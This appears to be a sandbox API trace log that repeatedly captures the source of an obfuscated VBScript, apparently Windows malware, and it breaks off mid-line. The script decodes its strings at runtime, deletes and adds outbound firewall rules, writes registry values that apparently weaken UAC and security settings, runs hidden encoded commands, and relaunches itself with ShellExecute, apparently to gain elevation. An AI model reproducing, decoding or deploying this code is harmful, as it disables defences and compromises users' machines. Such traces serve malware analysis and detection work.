bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.927] wcsncmp (_String1="0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0222.927] wcsncmp (_String1="\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0222.927] wcsncmp (_String1="\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.927] wcsncmp (_String1="sdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 